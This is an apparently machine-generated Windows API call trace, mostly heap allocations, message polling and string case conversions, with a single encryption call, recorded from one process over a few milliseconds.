[0262.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0262.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.595] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.595] CharLowerBuffW (in: lpsz="byte[40584]", cchLength=0xb | out: lpsz="byte[40584]") returned 0xb [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.596] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.596] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.597] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.597] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.597] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.597] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.597] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.598] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0262.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.598] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24cb768*, pdwDataLen=0x8bef68*=0x9e84, dwBufLen=0x9e88 | out: pbData=0x24cb768*, pdwDataLen=0x8bef68*=0x9e88) returned 1 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0262.599] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.599] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.599] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.600] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0262.600] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.600] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.600] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.600] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.601] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.601] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.601] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.601] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.601] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.601] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.601] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.602] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.602] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.602] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.602] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.602] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.602] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.603] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.603] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.603] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.603] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.603] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.603] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.609] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.609] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.609] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 